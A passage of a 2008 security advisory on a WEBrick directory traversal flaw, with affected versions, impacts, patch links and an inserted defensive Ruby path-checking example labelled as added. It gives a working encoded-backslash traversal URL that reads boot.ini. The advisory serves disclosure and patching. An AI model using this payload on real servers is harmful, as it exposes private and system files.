                         1.8.4 and all prior versions
                         1.8.5-p114 and all prior versions
                         1.8.6-p113 and all prior versions
                         1.9.0-1 and all prior versions

Vendor URL:              http://www.ruby-lang.org/
Bugs:                    Directory traversal File Download
Exploits:                YES
Reported:                20.02.2008
Vendor response:         22.02.2008
Solution:                03.03.2008
Date of Public Advisory: 06.03.2008
Authors:                 Alexandr Polyakov, Stas Svistunovich
                         Digital Security Research Group [DSecRG]
                         (research [at] dsec [dot] ru)



Description
***

The WEBrick HTTP server has a directory traversal vulnerability.

WEBrick is an HTTP server library written in Ruby that uses servlets to extend
its capabilities. Built into WEBrick are four servlets, handling CGI, ERb, file
directories, and a generic Proc servlet. Ruby on Rails uses WEBrick as a quick
and easy web server to start developing your Rails applications. However, for
whatever ease of development WEBrick adds to your application, it is generally
considered not suitable for any production environment.




Details
***

The following programs are vulnerable:

Programs that publish files using WEBrick::HTTPServer.new with the
:DocumentRoot option
Programs that publish files using WEBrick::HTTPServlet::FileHandler

Affected systems are:
1. Systems that accept backslash (\) as a path separator, such as Windows.
2. Systems that use case-insensitive filesystems, such as NTFS on Windows and
   HFS on Mac OS X.


This vulnerability has the following impacts:
1. An attacker can access private files by sending a URL with a URL-encoded
   backslash (\). This exploit works only on systems that accept backslash as a
   path separator.

Example:

http://[server]:[port]/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini


2. An attacker can access files that match the patterns specified by the
   :NondisclosureName option (the default value is [.ht*, *~]). This exploit
   works only on systems that use case-insensitive filesystems.
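Both impacts above come from the same root cause: the file handler normalizes the request path the way a POSIX filesystem would, while the underlying Windows or HFS filesystem accepts backslashes and ignores case. The following is an added example, not code from the advisory, WEBrick or Ruby, of a request-path check that closes both holes; DOC_ROOT and the function names are assumptions for illustration.

```ruby
# Added example, not code from the advisory, WEBrick or Ruby: a hardened
# request-path check for a static file handler. It percent-decodes once,
# treats '\' like '/' so an encoded backslash cannot bypass a '/'-only
# check, refuses any path that climbs above the document root, and
# matches the :NondisclosureName patterns case-insensitively so that
# '.HTACCESS' is hidden on NTFS/HFS as well as '.htaccess'.
# DOC_ROOT is a constructed sample value.
DOC_ROOT = '/var/www/docroot'
NONDISCLOSURE = ['.ht*', '*~']       # WEBrick's documented default patterns

# Decode %XX escapes exactly once (a second pass would re-open the hole
# via double encoding such as %252e).
def percent_decode(str)
  str.gsub(/%([0-9A-Fa-f]{2})/) { $1.hex.chr }
end

# Normalize the request path into segments under the document root.
# Returns nil when a '..' would escape the root.
def safe_segments(request_path)
  decoded = percent_decode(request_path).gsub('\\', '/')
  segments = []
  decoded.split('/').each do |seg|
    next if seg.empty? || seg == '.'
    if seg == '..'
      return nil if segments.empty?   # nothing left to pop: escape attempt
      segments.pop
    else
      segments << seg
    end
  end
  segments
end

# True if the file name matches a nondisclosure pattern, ignoring case,
# which is what a case-insensitive filesystem does when opening the file.
def nondisclosed?(basename)
  NONDISCLOSURE.any? do |pat|
    File.fnmatch(pat, basename, File::FNM_CASEFOLD | File::FNM_DOTMATCH)
  end
end

# Resolve a request path to an absolute path under DOC_ROOT, or nil to
# answer 403/404 instead of serving the file.
def resolve(request_path)
  segments = safe_segments(request_path)
  return nil if segments.nil?
  return nil if !segments.empty? && nondisclosed?(segments.last)
  File.join(DOC_ROOT, *segments)
end
```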



Additional info
***

WEBrick is used to build custom HTTP servers and is used in many applications,
such as Metasploit 3.1 and Karma Tools.



Fix Information
***

Fixed on 03.03.2008.

http://www.ruby-lang.org/en/news/2008/03/03/webrick-file-access-vulnerability/


Patches can be downloaded here:

1.8 series
Please upgrade to 1.8.5-p115 or 1.8.6-p114.
URL: ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.5-p115.tar.gz
     (md5sum: 20ca6cc87eb077296806412feaac0356)
URL: ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.6-p114.tar.gz
     (md5sum: 500a9f11613d6c8ab6dcf12bec1b3ed3)

1.9 series
Please apply the following patch to lib/webrick/httpservlet/filehandler.rb.
URL: ftp://ftp.ruby-lang.org/pub/ruby/1.9/ruby-1.9.0-1-webrick-vulnerability-fix.diff
     (md5sum: b7b58aed40fa1609a67f53cfd3a13257)




Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)




--

  Digital Security Research Group   mailto:[EMAIL PROTECTED]